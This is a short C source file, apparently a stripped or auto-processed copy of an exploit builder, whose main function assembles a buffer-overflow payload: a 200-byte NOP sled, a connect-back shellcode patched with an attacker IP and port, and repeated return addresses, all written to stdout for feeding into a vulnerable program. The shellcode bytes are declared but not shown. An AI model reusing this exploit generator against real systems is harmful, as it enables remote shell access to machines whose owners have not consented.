
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ ADDY ;
 int IP ;
 int POE ;
 int PORT ;
 int PORT_OFFSET ;
 scalar_t__ addys ;
 char* cb ;
 int changeip (int ) ;
 int changeport (char*,int ,int ) ;
 int fwrite (char*,int ,int,int ) ;
 int memcpy (char*,scalar_t__,int) ;
 int stdout ;
 int strlen (char*) ;

int main (void) {
        char buff[416];
        int a;

        changeip(IP);
        changeport(cb, PORT, PORT_OFFSET);

        for (a = 0; a < 200; a++)
                *(buff+a) = 0x90;

        for (int b = 0; *(cb+b); a++, b++)
                *(buff+a) = *(cb+b);

        for (; a + 4 <= POE; a += 4)
                memcpy(buff+a, (addys+ADDY), 4);

        *(buff+a) = 0;

        fwrite(buff, strlen(buff), 1, stdout);
        return(0);
}
